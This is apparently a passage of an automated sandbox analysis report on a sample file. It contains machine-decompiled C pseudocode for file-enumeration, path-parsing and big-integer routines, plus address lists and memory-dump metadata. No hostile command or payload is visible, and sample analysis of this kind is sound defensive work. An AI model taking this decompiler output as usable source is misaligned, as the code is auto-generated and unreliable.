                                                                                                                                                                                                                                                                      						_push(_t117);
                                                                                                                                                                                                                                                                      						_t85 = E0118BE98(_t99, _t124, _t89, _a8);
                                                                                                                                                                                                                                                                      						_t134 = _t133 + 0x10;
                                                                                                                                                                                                                                                                      						__eflags = _t85;
                                                                                                                                                                                                                                                                      						if(_t85 != 0) {
                                                                                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                                                      							E0118977A();
                                                                                                                                                                                                                                                                      							asm("int3");
                                                                                                                                                                                                                                                                      							_t132 = _t134;
                                                                                                                                                                                                                                                                      							_t135 = _t134 - 0x260;
                                                                                                                                                                                                                                                                      							_t48 =  *0x121dd74; // 0x2bc0e270
                                                                                                                                                                                                                                                                      							_v48 = _t48 ^ _t132;
                                                                                                                                                                                                                                                                      							_t111 = _v28;
                                                                                                                                                                                                                                                                      							_t100 = _v32;
                                                                                                                                                                                                                                                                      							_push(_t89);
                                                                                                                                                                                                                                                                      							_t90 = _v36;
                                                                                                                                                                                                                                                                      							_push(_t124);
                                                                                                                                                                                                                                                                      							_push(_t117);
                                                                                                                                                                                                                                                                      							_t125 = 0x5c;
                                                                                                                                                                                                                                                                      							_v644 = _t111;
                                                                                                                                                                                                                                                                      							_v648 = 0x2f;
                                                                                                                                                                                                                                                                      							_t118 = 0x3a;
                                                                                                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                                                                                                      								__eflags = _t100 - _t90;
                                                                                                                                                                                                                                                                      								if(_t100 == _t90) {
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t50 =  *_t100 & 0x0000ffff;
                                                                                                                                                                                                                                                                      								__eflags = _t50 - _v612;
                                                                                                                                                                                                                                                                      								if(_t50 != _v612) {
                                                                                                                                                                                                                                                                      									__eflags = _t50 - _t125;
                                                                                                                                                                                                                                                                      									if(_t50 != _t125) {
                                                                                                                                                                                                                                                                      										__eflags = _t50 - _t118;
                                                                                                                                                                                                                                                                      										if(_t50 != _t118) {
                                                                                                                                                                                                                                                                      											_t100 = _t100 - 2;
                                                                                                                                                                                                                                                                      											__eflags = _t100;
                                                                                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t126 =  *_t100 & 0x0000ffff;
                                                                                                                                                                                                                                                                      							__eflags = _t126 - _t118;
                                                                                                                                                                                                                                                                      							if(_t126 != _t118) {
                                                                                                                                                                                                                                                                      								L19:
                                                                                                                                                                                                                                                                      								_t51 = _t126;
                                                                                                                                                                                                                                                                      								_t119 = 0;
                                                                                                                                                                                                                                                                      								_t112 = 0x2f;
                                                                                                                                                                                                                                                                      								__eflags = _t51 - _t112;
                                                                                                                                                                                                                                                                      								if(_t51 == _t112) {
                                                                                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                                                                                      									_t53 = 1;
                                                                                                                                                                                                                                                                      									__eflags = 1;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_t114 = 0x5c;
                                                                                                                                                                                                                                                                      									__eflags = _t51 - _t114;
                                                                                                                                                                                                                                                                      									if(_t51 == _t114) {
                                                                                                                                                                                                                                                                      										goto L23;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_t115 = 0x3a;
                                                                                                                                                                                                                                                                      										__eflags = _t51 - _t115;
                                                                                                                                                                                                                                                                      										if(_t51 == _t115) {
                                                                                                                                                                                                                                                                      											goto L23;
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											_t53 = 0;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t103 = (_t100 - _t90 >> 1) + 1;
                                                                                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
                                                                                                                                                                                                                                                                      								E0118F070(_t119,  &_v604, _t119, 0x250);
                                                                                                                                                                                                                                                                      								_t136 = _t135 + 0xc;
                                                                                                                                                                                                                                                                      								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
                                                                                                                                                                                                                                                                      								__eflags = _t127 - 0xffffffff;
                                                                                                                                                                                                                                                                      								if(_t127 != 0xffffffff) {
                                                                                                                                                                                                                                                                      									_t104 = _v608;
                                                                                                                                                                                                                                                                      									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
                                                                                                                                                                                                                                                                      									__eflags = _t62;
                                                                                                                                                                                                                                                                      									_v616 = _t62 >> 2;
                                                                                                                                                                                                                                                                      									_t64 = 0x2e;
                                                                                                                                                                                                                                                                      									do {
                                                                                                                                                                                                                                                                      										__eflags = _v604.cFileName - _t64;
                                                                                                                                                                                                                                                                      										if(_v604.cFileName != _t64) {
                                                                                                                                                                                                                                                                      											L36:
                                                                                                                                                                                                                                                                      											_push(_t104);
                                                                                                                                                                                                                                                                      											_t66 = E01191989(_t90, _t104, _t119, _t127,  &(_v604.cFileName), _t90, _v612);
                                                                                                                                                                                                                                                                      											_t136 = _t136 + 0x10;
                                                                                                                                                                                                                                                                      											__eflags = _t66;
                                                                                                                                                                                                                                                                      											if(_t66 != 0) {
                                                                                                                                                                                                                                                                      												goto L26;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											__eflags = _v558 - _t119;
                                                                                                                                                                                                                                                                      											if(_v558 == _t119) {
                                                                                                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												__eflags = _v558 - _t64;
                                                                                                                                                                                                                                                                      												if(_v558 != _t64) {
                                                                                                                                                                                                                                                                      													goto L36;
                                                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                                                      													__eflags = _v556 - _t119;
                                                                                                                                                                                                                                                                      													if(_v556 == _t119) {
                                                                                                                                                                                                                                                                      														goto L37;
                                                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                                                      														goto L36;
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                                                                                      										L37:
                                                                                                                                                                                                                                                                      										_t71 = FindNextFileW(_t127,  &_v604);
                                                                                                                                                                                                                                                                      										_t104 = _v608;
                                                                                                                                                                                                                                                                      										__eflags = _t71;
                                                                                                                                                                                                                                                                      										_t64 = 0x2e;
                                                                                                                                                                                                                                                                      									} while (_t71 != 0);
                                                                                                                                                                                                                                                                      									_t72 = _t104;
                                                                                                                                                                                                                                                                      									_t107 = _v616;
                                                                                                                                                                                                                                                                      									_t113 =  *_t72;
                                                                                                                                                                                                                                                                      									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
                                                                                                                                                                                                                                                                      									__eflags = _t107 - _t75;
                                                                                                                                                                                                                                                                      									if(_t107 != _t75) {
                                                                                                                                                                                                                                                                      										E01192A50(_t90, _t119, _t127, _t113 + _t107 * 4, _t75 - _t107, 4, E011917A4);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_push(_v608);
                                                                                                                                                                                                                                                                      									_t66 = E01191989(_t90, _t103, _t119, _t127, _t90, _t119, _t119);
                                                                                                                                                                                                                                                                      									L26:
                                                                                                                                                                                                                                                                      									_t119 = _t66;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								__eflags = _t127 - 0xffffffff;
                                                                                                                                                                                                                                                                      								if(_t127 != 0xffffffff) {
                                                                                                                                                                                                                                                                      									FindClose(_t127);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								__eflags = _t100 -  &(_t90[1]);
                                                                                                                                                                                                                                                                      								if(_t100 ==  &(_t90[1])) {
                                                                                                                                                                                                                                                                      									goto L19;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_push(_t111);
                                                                                                                                                                                                                                                                      									E01191989(_t90, _t100, 0, _t126, _t90, 0, 0);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _v12 ^ _t132;
                                                                                                                                                                                                                                                                      							return E0118DC5F(_v12 ^ _t132);
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t84 = 0xc;
                                                                                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                                                                                      					return _t84;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L40:
                                                                                                                                                                                                                                                                      			}

























































                                                                                                                                                                                                                                                                      0x0119198e
                                                                                                                                                                                                                                                                      0x0119198f
                                                                                                                                                                                                                                                                      0x01191992
                                                                                                                                                                                                                                                                      0x01191993
                                                                                                                                                                                                                                                                      0x01191996
                                                                                                                                                                                                                                                                      0x01191996
                                                                                                                                                                                                                                                                      0x01191999
                                                                                                                                                                                                                                                                      0x01191999
                                                                                                                                                                                                                                                                      0x0119199c
                                                                                                                                                                                                                                                                      0x0119199f
                                                                                                                                                                                                                                                                      0x011919a4
                                                                                                                                                                                                                                                                      0x011919ae
                                                                                                                                                                                                                                                                      0x011919b1
                                                                                                                                                                                                                                                                      0x011919b6
                                                                                                                                                                                                                                                                      0x011919bd
                                                                                                                                                                                                                                                                      0x011919be
                                                                                                                                                                                                                                                                      0x011919c1
                                                                                                                                                                                                                                                                      0x011919cb
                                                                                                                                                                                                                                                                      0x011919ce
                                                                                                                                                                                                                                                                      0x011919cf
                                                                                                                                                                                                                                                                      0x011919d1
                                                                                                                                                                                                                                                                      0x011919e5
                                                                                                                                                                                                                                                                      0x011919e5
                                                                                                                                                                                                                                                                      0x011919e8
                                                                                                                                                                                                                                                                      0x011919f2
                                                                                                                                                                                                                                                                      0x011919f7
                                                                                                                                                                                                                                                                      0x011919fa
                                                                                                                                                                                                                                                                      0x011919fc
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011919fe
                                                                                                                                                                                                                                                                      0x01191a02
                                                                                                                                                                                                                                                                      0x01191a0b
                                                                                                                                                                                                                                                                      0x01191a11
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191a13
                                                                                                                                                                                                                                                                      0x011919d3
                                                                                                                                                                                                                                                                      0x011919d3
                                                                                                                                                                                                                                                                      0x011919d9
                                                                                                                                                                                                                                                                      0x011919de
                                                                                                                                                                                                                                                                      0x011919e1
                                                                                                                                                                                                                                                                      0x011919e3
                                                                                                                                                                                                                                                                      0x01191a1a
                                                                                                                                                                                                                                                                      0x01191a1c
                                                                                                                                                                                                                                                                      0x01191a1d
                                                                                                                                                                                                                                                                      0x01191a1e
                                                                                                                                                                                                                                                                      0x01191a1f
                                                                                                                                                                                                                                                                      0x01191a20
                                                                                                                                                                                                                                                                      0x01191a21
                                                                                                                                                                                                                                                                      0x01191a26
                                                                                                                                                                                                                                                                      0x01191a2a
                                                                                                                                                                                                                                                                      0x01191a2c
                                                                                                                                                                                                                                                                      0x01191a32
                                                                                                                                                                                                                                                                      0x01191a39
                                                                                                                                                                                                                                                                      0x01191a3c
                                                                                                                                                                                                                                                                      0x01191a3f
                                                                                                                                                                                                                                                                      0x01191a42
                                                                                                                                                                                                                                                                      0x01191a43
                                                                                                                                                                                                                                                                      0x01191a46
                                                                                                                                                                                                                                                                      0x01191a47
                                                                                                                                                                                                                                                                      0x01191a4a
                                                                                                                                                                                                                                                                      0x01191a4d
                                                                                                                                                                                                                                                                      0x01191a53
                                                                                                                                                                                                                                                                      0x01191a5d
                                                                                                                                                                                                                                                                      0x01191a79
                                                                                                                                                                                                                                                                      0x01191a79
                                                                                                                                                                                                                                                                      0x01191a7b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191a60
                                                                                                                                                                                                                                                                      0x01191a63
                                                                                                                                                                                                                                                                      0x01191a6a
                                                                                                                                                                                                                                                                      0x01191a6c
                                                                                                                                                                                                                                                                      0x01191a6f
                                                                                                                                                                                                                                                                      0x01191a71
                                                                                                                                                                                                                                                                      0x01191a74
                                                                                                                                                                                                                                                                      0x01191a76
                                                                                                                                                                                                                                                                      0x01191a76
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191a76
                                                                                                                                                                                                                                                                      0x01191a74
                                                                                                                                                                                                                                                                      0x01191a6f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191a6a
                                                                                                                                                                                                                                                                      0x01191a7d
                                                                                                                                                                                                                                                                      0x01191a80
                                                                                                                                                                                                                                                                      0x01191a83
                                                                                                                                                                                                                                                                      0x01191a9f
                                                                                                                                                                                                                                                                      0x01191aa1
                                                                                                                                                                                                                                                                      0x01191aa3
                                                                                                                                                                                                                                                                      0x01191aa5
                                                                                                                                                                                                                                                                      0x01191aa6
                                                                                                                                                                                                                                                                      0x01191aa9
                                                                                                                                                                                                                                                                      0x01191abf
                                                                                                                                                                                                                                                                      0x01191ac1
                                                                                                                                                                                                                                                                      0x01191ac1
                                                                                                                                                                                                                                                                      0x01191aab
                                                                                                                                                                                                                                                                      0x01191aad
                                                                                                                                                                                                                                                                      0x01191aae
                                                                                                                                                                                                                                                                      0x01191ab1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191ab3
                                                                                                                                                                                                                                                                      0x01191ab5
                                                                                                                                                                                                                                                                      0x01191ab6
                                                                                                                                                                                                                                                                      0x01191ab9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191abb
                                                                                                                                                                                                                                                                      0x01191abb
                                                                                                                                                                                                                                                                      0x01191abb
                                                                                                                                                                                                                                                                      0x01191ab9
                                                                                                                                                                                                                                                                      0x01191ab1
                                                                                                                                                                                                                                                                      0x01191ac9
                                                                                                                                                                                                                                                                      0x01191ad1
                                                                                                                                                                                                                                                                      0x01191ad5
                                                                                                                                                                                                                                                                      0x01191ae3
                                                                                                                                                                                                                                                                      0x01191ae8
                                                                                                                                                                                                                                                                      0x01191afd
                                                                                                                                                                                                                                                                      0x01191aff
                                                                                                                                                                                                                                                                      0x01191b02
                                                                                                                                                                                                                                                                      0x01191b37
                                                                                                                                                                                                                                                                      0x01191b42
                                                                                                                                                                                                                                                                      0x01191b42
                                                                                                                                                                                                                                                                      0x01191b47
                                                                                                                                                                                                                                                                      0x01191b4d
                                                                                                                                                                                                                                                                      0x01191b4e
                                                                                                                                                                                                                                                                      0x01191b4e
                                                                                                                                                                                                                                                                      0x01191b55
                                                                                                                                                                                                                                                                      0x01191b72
                                                                                                                                                                                                                                                                      0x01191b72
                                                                                                                                                                                                                                                                      0x01191b81
                                                                                                                                                                                                                                                                      0x01191b86
                                                                                                                                                                                                                                                                      0x01191b89
                                                                                                                                                                                                                                                                      0x01191b8b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191b57
                                                                                                                                                                                                                                                                      0x01191b57
                                                                                                                                                                                                                                                                      0x01191b5e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191b60
                                                                                                                                                                                                                                                                      0x01191b60
                                                                                                                                                                                                                                                                      0x01191b67
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191b69
                                                                                                                                                                                                                                                                      0x01191b69
                                                                                                                                                                                                                                                                      0x01191b70
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191b70
                                                                                                                                                                                                                                                                      0x01191b67
                                                                                                                                                                                                                                                                      0x01191b5e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191b8d
                                                                                                                                                                                                                                                                      0x01191b95
                                                                                                                                                                                                                                                                      0x01191b9b
                                                                                                                                                                                                                                                                      0x01191ba1
                                                                                                                                                                                                                                                                      0x01191ba5
                                                                                                                                                                                                                                                                      0x01191ba5
                                                                                                                                                                                                                                                                      0x01191ba8
                                                                                                                                                                                                                                                                      0x01191baa
                                                                                                                                                                                                                                                                      0x01191bb0
                                                                                                                                                                                                                                                                      0x01191bb7
                                                                                                                                                                                                                                                                      0x01191bba
                                                                                                                                                                                                                                                                      0x01191bbc
                                                                                                                                                                                                                                                                      0x01191bd0
                                                                                                                                                                                                                                                                      0x01191bd5
                                                                                                                                                                                                                                                                      0x01191b04
                                                                                                                                                                                                                                                                      0x01191b0a
                                                                                                                                                                                                                                                                      0x01191b0e
                                                                                                                                                                                                                                                                      0x01191b16
                                                                                                                                                                                                                                                                      0x01191b16
                                                                                                                                                                                                                                                                      0x01191b16
                                                                                                                                                                                                                                                                      0x01191b18
                                                                                                                                                                                                                                                                      0x01191b1b
                                                                                                                                                                                                                                                                      0x01191b1e
                                                                                                                                                                                                                                                                      0x01191b1e
                                                                                                                                                                                                                                                                      0x01191a85
                                                                                                                                                                                                                                                                      0x01191a88
                                                                                                                                                                                                                                                                      0x01191a8a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191a8c
                                                                                                                                                                                                                                                                      0x01191a8c
                                                                                                                                                                                                                                                                      0x01191a92
                                                                                                                                                                                                                                                                      0x01191a97
                                                                                                                                                                                                                                                                      0x01191a8a
                                                                                                                                                                                                                                                                      0x01191b2b
                                                                                                                                                                                                                                                                      0x01191b36
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011919e3
                                                                                                                                                                                                                                                                      0x011919b8
                                                                                                                                                                                                                                                                      0x011919ba
                                                                                                                                                                                                                                                                      0x01191a14
                                                                                                                                                                                                                                                                      0x01191a19
                                                                                                                                                                                                                                                                      0x01191a19
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                                                      • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                      • Opcode ID: fe06b1e728d53ee30fbba5a0d83a68788ad3cb3fef63211d7d67420ed0e6e25b
                                                                                                                                                                                                                                                                      • Instruction ID: 7c3b45a3cea86713e910e9338e25643793dfb71f73bbd17be10544ac1670b15e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe06b1e728d53ee30fbba5a0d83a68788ad3cb3fef63211d7d67420ed0e6e25b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C41187290021ABFDF289EBDDC48DBB77B9EB80724F5042A9E91597180F7309E81CB50
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                                                                                                                      			E01188340(signed int* _a4, signed int* _a8) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                                                                                                      				signed int _v76;
                                                                                                                                                                                                                                                                      				signed int* _v80;
                                                                                                                                                                                                                                                                      				char _v540;
                                                                                                                                                                                                                                                                      				signed int _v544;
                                                                                                                                                                                                                                                                      				signed int _t197;
                                                                                                                                                                                                                                                                      				signed int _t198;
                                                                                                                                                                                                                                                                      				signed int* _t200;
                                                                                                                                                                                                                                                                      				signed int _t201;
                                                                                                                                                                                                                                                                      				signed int _t204;
                                                                                                                                                                                                                                                                      				signed int _t206;
                                                                                                                                                                                                                                                                      				signed int _t208;
                                                                                                                                                                                                                                                                      				signed int _t209;
                                                                                                                                                                                                                                                                      				signed int _t213;
                                                                                                                                                                                                                                                                      				signed int _t219;
                                                                                                                                                                                                                                                                      				intOrPtr _t225;
                                                                                                                                                                                                                                                                      				void* _t228;
                                                                                                                                                                                                                                                                      				signed int _t230;
                                                                                                                                                                                                                                                                      				signed int _t247;
                                                                                                                                                                                                                                                                      				signed int _t250;
                                                                                                                                                                                                                                                                      				void* _t253;
                                                                                                                                                                                                                                                                      				signed int _t256;
                                                                                                                                                                                                                                                                      				signed int* _t262;
                                                                                                                                                                                                                                                                      				signed int _t263;
                                                                                                                                                                                                                                                                      				signed int _t264;
                                                                                                                                                                                                                                                                      				void* _t265;
                                                                                                                                                                                                                                                                      				intOrPtr* _t266;
                                                                                                                                                                                                                                                                      				signed int _t267;
                                                                                                                                                                                                                                                                      				signed int _t269;
                                                                                                                                                                                                                                                                      				signed int _t270;
                                                                                                                                                                                                                                                                      				signed int _t271;
                                                                                                                                                                                                                                                                      				signed int _t272;
                                                                                                                                                                                                                                                                      				signed int* _t274;
                                                                                                                                                                                                                                                                      				signed int* _t278;
                                                                                                                                                                                                                                                                      				signed int _t279;
                                                                                                                                                                                                                                                                      				signed int _t280;
                                                                                                                                                                                                                                                                      				intOrPtr _t282;
                                                                                                                                                                                                                                                                      				void* _t286;
                                                                                                                                                                                                                                                                      				signed char _t292;
                                                                                                                                                                                                                                                                      				signed int _t295;
                                                                                                                                                                                                                                                                      				signed int _t303;
                                                                                                                                                                                                                                                                      				signed int _t306;
                                                                                                                                                                                                                                                                      				signed int _t307;
                                                                                                                                                                                                                                                                      				signed int _t309;
                                                                                                                                                                                                                                                                      				signed int _t311;
                                                                                                                                                                                                                                                                      				signed int _t313;
                                                                                                                                                                                                                                                                      				intOrPtr* _t314;
                                                                                                                                                                                                                                                                      				signed int _t318;
                                                                                                                                                                                                                                                                      				signed int _t322;
                                                                                                                                                                                                                                                                      				signed int* _t328;
                                                                                                                                                                                                                                                                      				signed int _t330;
                                                                                                                                                                                                                                                                      				signed int _t331;
                                                                                                                                                                                                                                                                      				signed int _t333;
                                                                                                                                                                                                                                                                      				void* _t334;
                                                                                                                                                                                                                                                                      				signed int _t336;
                                                                                                                                                                                                                                                                      				signed int _t338;
                                                                                                                                                                                                                                                                      				signed int _t341;
                                                                                                                                                                                                                                                                      				signed int _t342;
                                                                                                                                                                                                                                                                      				signed int* _t344;
                                                                                                                                                                                                                                                                      				signed int _t349;
                                                                                                                                                                                                                                                                      				signed int _t351;
                                                                                                                                                                                                                                                                      				void* _t355;
                                                                                                                                                                                                                                                                      				signed int _t359;
                                                                                                                                                                                                                                                                      				signed int _t360;
                                                                                                                                                                                                                                                                      				signed int _t362;
                                                                                                                                                                                                                                                                      				signed int* _t368;
                                                                                                                                                                                                                                                                      				signed int* _t369;
                                                                                                                                                                                                                                                                      				signed int* _t370;
                                                                                                                                                                                                                                                                      				signed int* _t373;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t262 = _a4;
                                                                                                                                                                                                                                                                      				_t197 =  *_t262;
                                                                                                                                                                                                                                                                      				if(_t197 != 0) {
                                                                                                                                                                                                                                                                      					_t328 = _a8;
                                                                                                                                                                                                                                                                      					_t267 =  *_t328;
                                                                                                                                                                                                                                                                      					__eflags = _t267;
                                                                                                                                                                                                                                                                      					if(_t267 != 0) {
                                                                                                                                                                                                                                                                      						_t349 = _t197 - 1;
                                                                                                                                                                                                                                                                      						_t198 = _t267 - 1;
                                                                                                                                                                                                                                                                      						_v16 = _t349;
                                                                                                                                                                                                                                                                      						__eflags = _t198;
                                                                                                                                                                                                                                                                      						if(_t198 != 0) {
                                                                                                                                                                                                                                                                      							__eflags = _t198 - _t349;
                                                                                                                                                                                                                                                                      							if(_t198 > _t349) {
                                                                                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t306 = _t349 - _t198;
                                                                                                                                                                                                                                                                      								_v60 = _t198 + 1;
                                                                                                                                                                                                                                                                      								_t269 = _t349;
                                                                                                                                                                                                                                                                      								__eflags = _t349 - _t306;
                                                                                                                                                                                                                                                                      								if(_t349 < _t306) {
                                                                                                                                                                                                                                                                      									L21:
                                                                                                                                                                                                                                                                      									_t306 = _t306 + 1;
                                                                                                                                                                                                                                                                      									__eflags = _t306;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_t368 =  &(_t262[_t349 + 1]);
                                                                                                                                                                                                                                                                      									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                                                                                                                                                                                                                                      									__eflags = _t341;
                                                                                                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                                                                                                      										__eflags =  *_t341 -  *_t368;
                                                                                                                                                                                                                                                                      										if( *_t341 !=  *_t368) {
                                                                                                                                                                                                                                                                      											break;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_t269 = _t269 - 1;
                                                                                                                                                                                                                                                                      										_t341 = _t341 - 4;
                                                                                                                                                                                                                                                                      										_t368 = _t368 - 4;
                                                                                                                                                                                                                                                                      										__eflags = _t269 - _t306;
                                                                                                                                                                                                                                                                      										if(_t269 >= _t306) {
                                                                                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											goto L21;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										goto L22;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_t369 = _a8;
                                                                                                                                                                                                                                                                      									_t54 = (_t269 - _t306) * 4; // 0x8b00ffff
                                                                                                                                                                                                                                                                      									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                                                                                                                                                                                                                                      									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                                                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								L22:
                                                                                                                                                                                                                                                                      								__eflags = _t306;
                                                                                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                                                                                      									_t330 = _v60;
                                                                                                                                                                                                                                                                      									_t200 = _a8;
                                                                                                                                                                                                                                                                      									_t351 =  *(_t200 + _t330 * 4);
                                                                                                                                                                                                                                                                      									_t64 = _t330 * 4; // 0x220
                                                                                                                                                                                                                                                                      									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                                                                                                                                                                                                                                                                      									_v36 = _t201;
                                                                                                                                                                                                                                                                      									asm("bsr eax, esi");
                                                                                                                                                                                                                                                                      									_v56 = _t351;
                                                                                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                                                                                      										_t270 = 0x20;
                                                                                                                                                                                                                                                                      									} else {
